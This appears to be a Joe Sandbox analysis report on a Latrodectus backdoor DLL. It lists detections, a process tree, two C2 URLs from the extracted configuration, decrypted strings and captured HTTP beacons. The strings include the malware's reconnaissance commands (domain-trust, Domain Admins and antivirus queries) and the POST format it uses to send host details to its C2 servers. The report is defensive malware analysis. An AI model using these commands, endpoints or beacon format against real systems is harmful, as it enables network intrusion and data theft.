Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r2iL9TLvO3.dll

Overview

General Information

Sample name:r2iL9TLvO3.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534.exe
Analysis ID:1469006
MD5:d46476f7f27be8ef618b7646a46f5e66
SHA1:8219d1ead31d16f6380941827bf96a488453d5c0
SHA256:9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534
Tags:exeLatrodectus
Infos:

Detection

Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Latrodectus
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Sample uses string decryption to hide its real strings
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to query network adapater information
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7480 cmdline: loaddll64.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7528 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7556 cmdline: rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7540 cmdline: rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra MD5: EF3179D498793BF4234F708D3BE28633)
      • rundll32.exe (PID: 7620 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7728 cmdline: rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7764 cmdline: rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 7640 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Unidentified 111 (Latrodectus), LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111
{"C2 url": ["https://winarkamaps.com/live/", "https://stratimasesstr.com/live/"], "Group Name": "Facial", "Campaign ID": 3828029093}
SourceRuleDescriptionAuthorStrings
r2iL9TLvO3.dllJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dllJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
        00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
          00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
            00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
              Process Memory Space: rundll32.exe PID: 7620JoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                6.2.rundll32.exe.7ffb1c810000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                  3.3.rundll32.exe.1ed7a460000.0.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                    3.2.rundll32.exe.7ffb1e860000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                      3.3.rundll32.exe.1ed7a460000.0.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                        No Sigma rule has matched
                        No Snort rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: r2iL9TLvO3.dllAvira: detected
                        Source: https://winarkamaps.com/qAvira URL Cloud: Label: malware
                        Source: https://winarkamaps.com/live/compAvira URL Cloud: Label: phishing
                        Source: https://stratimasesstr.com/FAvira URL Cloud: Label: malware
                        Source: https://winarkamaps.com/live/Avira URL Cloud: Label: malware
                        Source: https://winarkamaps.com/live/alAvira URL Cloud: Label: malware
                        Source: https://stratimasesstr.com/live/lAvira URL Cloud: Label: phishing
                        Source: https://winarkamaps.com/%Avira URL Cloud: Label: malware
                        Source: https://stratimasesstr.com/Avira URL Cloud: Label: malware
                        Source: https://winarkamaps.com/m/=Avira URL Cloud: Label: malware
                        Source: https://stratimasesstr.com/live/$Avira URL Cloud: Label: phishing
                        Source: https://stratimasesstr.com/live/Avira URL Cloud: Label: malware
                        Source: https://winarkamaps.com/Avira URL Cloud: Label: malware
                        Source: https://winarkamaps.com/live/FAvira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dllAvira: detection malicious, Label: TR/Agent.dxjic
                        Source: r2iL9TLvO3.dllMalware Configuration Extractor: Latrodectus {"C2 url": ["https://winarkamaps.com/live/", "https://stratimasesstr.com/live/"], "Group Name": "Facial", "Campaign ID": 3828029093}
                        Source: winarkamaps.comVirustotal: Detection: 20%Perma Link
                        Source: stratimasesstr.comVirustotal: Detection: 17%Perma Link
                        Source: https://winarkamaps.com/live/Virustotal: Detection: 18%Perma Link
                        Source: https://stratimasesstr.com/Virustotal: Detection: 17%Perma Link
                        Source: https://winarkamaps.com/live/FVirustotal: Detection: 17%Perma Link
                        Source: https://winarkamaps.com/Virustotal: Detection: 20%Perma Link
                        Source: https://stratimasesstr.com/live/Virustotal: Detection: 15%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dllReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dllVirustotal: Detection: 79%Perma Link
                        Source: r2iL9TLvO3.dllVirustotal: Detection: 79%Perma Link
                        Source: r2iL9TLvO3.dllReversingLabs: Detection: 65%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                        Source: r2iL9TLvO3.dllString decryptor: /c ipconfig /all
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: /c systeminfo
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: /c nltest /domain_trusts
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: /c net view /all /domain
                        Source: r2iL9TLvO3.dllString decryptor: /c nltest /domain_trusts /all_trusts
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: /c net view /all
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: &ipconfig=
                        Source: r2iL9TLvO3.dllString decryptor: /c net group "Domain Admins" /domain
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\wbem\wmic.exe
                        Source: r2iL9TLvO3.dllString decryptor: /c net config workstation
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: /c whoami /groups
                        Source: r2iL9TLvO3.dllString decryptor: C:\Windows\System32\cmd.exe
                        Source: r2iL9TLvO3.dllString decryptor: &systeminfo=
                        Source: r2iL9TLvO3.dllString decryptor: &domain_trusts=
                        Source: r2iL9TLvO3.dllString decryptor: &domain_trusts_all=
                        Source: r2iL9TLvO3.dllString decryptor: &net_view_all_domain=
                        Source: r2iL9TLvO3.dllString decryptor: &net_view_all=
                        Source: r2iL9TLvO3.dllString decryptor: &net_group=
                        Source: r2iL9TLvO3.dllString decryptor: &wmic=
                        Source: r2iL9TLvO3.dllString decryptor: &net_config_ws=
                        Source: r2iL9TLvO3.dllString decryptor: &net_wmic_av=
                        Source: r2iL9TLvO3.dllString decryptor: &whoami_group=
                        Source: r2iL9TLvO3.dllString decryptor: "pid":
                        Source: r2iL9TLvO3.dllString decryptor: "%d",
                        Source: r2iL9TLvO3.dllString decryptor: "proc":
                        Source: r2iL9TLvO3.dllString decryptor: "%s",
                        Source: r2iL9TLvO3.dllString decryptor: "subproc": [
                        Source: r2iL9TLvO3.dllString decryptor: &proclist=[
                        Source: r2iL9TLvO3.dllString decryptor: "pid":
                        Source: r2iL9TLvO3.dllString decryptor: "%d",
                        Source: r2iL9TLvO3.dllString decryptor: "proc":
                        Source: r2iL9TLvO3.dllString decryptor: "%s",
                        Source: r2iL9TLvO3.dllString decryptor: "subproc": [
                        Source: r2iL9TLvO3.dllString decryptor: &desklinks=[
                        Source: r2iL9TLvO3.dllString decryptor: *.*
                        Source: r2iL9TLvO3.dllString decryptor: "%s"
                        Source: r2iL9TLvO3.dllString decryptor: Update_%x
                        Source: r2iL9TLvO3.dllString decryptor: Custom_update
                        Source: r2iL9TLvO3.dllString decryptor: .dll
                        Source: r2iL9TLvO3.dllString decryptor: .exe
                        Source: r2iL9TLvO3.dllString decryptor: Updater
                        Source: r2iL9TLvO3.dllString decryptor: "%s"
                        Source: r2iL9TLvO3.dllString decryptor: rundll32.exe
                        Source: r2iL9TLvO3.dllString decryptor: "%s", %s %s
                        Source: r2iL9TLvO3.dllString decryptor: runnung
                        Source: r2iL9TLvO3.dllString decryptor: :wtfbbq
                        Source: r2iL9TLvO3.dllString decryptor: %d
                        Source: r2iL9TLvO3.dllString decryptor: %s%s
                        Source: r2iL9TLvO3.dllString decryptor: files/bp.dat
                        Source: r2iL9TLvO3.dllString decryptor: %s\%d.dll
                        Source: r2iL9TLvO3.dllString decryptor: %d.dat
                        Source: r2iL9TLvO3.dllString decryptor: %s\%s
                        Source: r2iL9TLvO3.dllString decryptor: init -zzzz="%s\%s"
                        Source: r2iL9TLvO3.dllString decryptor: front
                        Source: r2iL9TLvO3.dllString decryptor: /files/
                        Source: r2iL9TLvO3.dllString decryptor: Facial
                        Source: r2iL9TLvO3.dllString decryptor: .exe
                        Source: r2iL9TLvO3.dllString decryptor: Content-Type: application/x-www-form-urlencoded
                        Source: r2iL9TLvO3.dllString decryptor: POST
                        Source: r2iL9TLvO3.dllString decryptor: GET
                        Source: r2iL9TLvO3.dllString decryptor: curl/7.88.1
                        Source: r2iL9TLvO3.dllString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                        Source: r2iL9TLvO3.dllString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                        Source: r2iL9TLvO3.dllString decryptor: CLEARURL
                        Source: r2iL9TLvO3.dllString decryptor: URLS
                        Source: r2iL9TLvO3.dllString decryptor: COMMAND
                        Source: r2iL9TLvO3.dllString decryptor: ERROR
                        Source: r2iL9TLvO3.dllString decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
                        Source: r2iL9TLvO3.dllString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                        Source: r2iL9TLvO3.dllString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                        Source: r2iL9TLvO3.dllString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                        Source: r2iL9TLvO3.dllString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                        Source: r2iL9TLvO3.dllString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
                        Source: r2iL9TLvO3.dllString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                        Source: r2iL9TLvO3.dllString decryptor: <html>
                        Source: r2iL9TLvO3.dllString decryptor: <!DOCTYPE
                        Source: r2iL9TLvO3.dllString decryptor: %s%d.dll
                        Source: r2iL9TLvO3.dllString decryptor: 12345
                        Source: r2iL9TLvO3.dllString decryptor: &stiller=
                        Source: r2iL9TLvO3.dllString decryptor: %s%d.exe
                        Source: r2iL9TLvO3.dllString decryptor: LogonTrigger
                        Source: r2iL9TLvO3.dllString decryptor: %x%x
                        Source: r2iL9TLvO3.dllString decryptor: TimeTrigger
                        Source: r2iL9TLvO3.dllString decryptor: PT1H%02dM
                        Source: r2iL9TLvO3.dllString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                        Source: r2iL9TLvO3.dllString decryptor: &mac=
                        Source: r2iL9TLvO3.dllString decryptor: %02x
                        Source: r2iL9TLvO3.dllString decryptor: :%02x
                        Source: r2iL9TLvO3.dllString decryptor: PT0S
                        Source: r2iL9TLvO3.dllString decryptor: &computername=%s
                        Source: r2iL9TLvO3.dllString decryptor: &domain=%s
                        Source: r2iL9TLvO3.dllString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                        Source: r2iL9TLvO3.dllString decryptor: \*.dll
                        Source: r2iL9TLvO3.dllString decryptor: %04X%04X%04X%04X%08X%04X
                        Source: r2iL9TLvO3.dllString decryptor: %04X%04X%04X%04X%08X%04X
                        Source: r2iL9TLvO3.dllString decryptor: \Registry\Machine\
                        Source: r2iL9TLvO3.dllString decryptor: https://winarkamaps.com/live/
                        Source: r2iL9TLvO3.dllString decryptor: https://stratimasesstr.com/live/
                        Source: r2iL9TLvO3.dllString decryptor: AppData
                        Source: r2iL9TLvO3.dllString decryptor: Desktop
                        Source: r2iL9TLvO3.dllString decryptor: Startup
                        Source: r2iL9TLvO3.dllString decryptor: Personal
                        Source: r2iL9TLvO3.dllString decryptor: Local AppData
                        Source: r2iL9TLvO3.dllString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                        Source: r2iL9TLvO3.dllString decryptor: \update_data.dat
                        Source: r2iL9TLvO3.dllString decryptor: URLS
                        Source: r2iL9TLvO3.dllString decryptor: URLS|%d|%s
                        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49708 version: TLS 1.2
                        Source: r2iL9TLvO3.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86A350 FindFirstFileW,FindNextFileW,LoadLibraryW,3_2_00007FFB1E86A350
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E861A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,3_2_00007FFB1E861A08
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81A350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_00007FFB1C81A350
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C811A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_00007FFB1C811A08

                        Networking

                        barindex
                        Source: Malware configuration extractorURLs: https://winarkamaps.com/live/
                        Source: Malware configuration extractorURLs: https://stratimasesstr.com/live/
                        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: winarkamaps.comContent-Length: 252Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: winarkamaps.comContent-Length: 252Cache-Control: no-cache
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E864F58 InternetReadFile,3_2_00007FFB1E864F58
                        Source: global trafficDNS traffic detected: DNS query: winarkamaps.com
                        Source: global trafficDNS traffic detected: DNS query: stratimasesstr.com
                        Source: unknownHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: winarkamaps.comContent-Length: 252Cache-Control: no-cache
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stratimasesstr.com/
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stratimasesstr.com/F
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stratimasesstr.com/live/
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stratimasesstr.com/live/$
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stratimasesstr.com/live/l
                        Source: rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/%
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/live/
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/live/F
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/live/al
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/live/comp
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/m/=
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winarkamaps.com/q
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49708 version: TLS 1.2
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86AD34 NtAllocateVirtualMemory,3_2_00007FFB1E86AD34
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E867A54 NtWriteFile,3_2_00007FFB1E867A54
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E867B40 NtFreeVirtualMemory,3_2_00007FFB1E867B40
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,FindCloseChangeNotification,3_2_00007FFB1E86463C
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86378C NtClose,3_2_00007FFB1E86378C
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E867588 RtlInitUnicodeString,NtCreateFile,NtClose,3_2_00007FFB1E867588
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E8677B0 RtlInitUnicodeString,NtCreateFile,3_2_00007FFB1E8677B0
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E867ACC NtClose,3_2_00007FFB1E867ACC
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,3_2_00007FFB1E86B1D4
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E8678C0 NtReadFile,3_2_00007FFB1E8678C0
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E8679C8 NtClose,3_2_00007FFB1E8679C8
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86C934 NtDelayExecution,3_2_00007FFB1E86C934
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86745C RtlInitUnicodeString,NtOpenFile,NtClose,3_2_00007FFB1E86745C
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E867694 RtlInitUnicodeString,NtDeleteFile,3_2_00007FFB1E867694
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E867704 NtQueryInformationFile,3_2_00007FFB1E867704
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81C934 NtDelayExecution,6_2_00007FFB1C81C934
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81AD34 NtAllocateVirtualMemory,6_2_00007FFB1C81AD34
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,FindCloseChangeNotification,6_2_00007FFB1C81463C
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C817B40 NtFreeVirtualMemory,6_2_00007FFB1C817B40
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81378C NtClose,6_2_00007FFB1C81378C
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C8177B0 RtlInitUnicodeString,NtCreateFile,6_2_00007FFB1C8177B0
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,6_2_00007FFB1C81B1D4
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C8179C8 NtClose,6_2_00007FFB1C8179C8
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C817A54 NtWriteFile,6_2_00007FFB1C817A54
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81745C RtlInitUnicodeString,NtOpenFile,NtClose,6_2_00007FFB1C81745C
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C817694 RtlInitUnicodeString,NtDeleteFile,6_2_00007FFB1C817694
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C817588 RtlInitUnicodeString,NtCreateFile,NtClose,6_2_00007FFB1C817588
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C817ACC NtClose,6_2_00007FFB1C817ACC
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C8178C0 NtReadFile,6_2_00007FFB1C8178C0
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C817704 NtQueryInformationFile,6_2_00007FFB1C817704
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E8610303_2_00007FFB1E861030
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C8110306_2_00007FFB1C811030
                        Source: classification engineClassification label: mal100.troj.winDLL@15/1@2/1
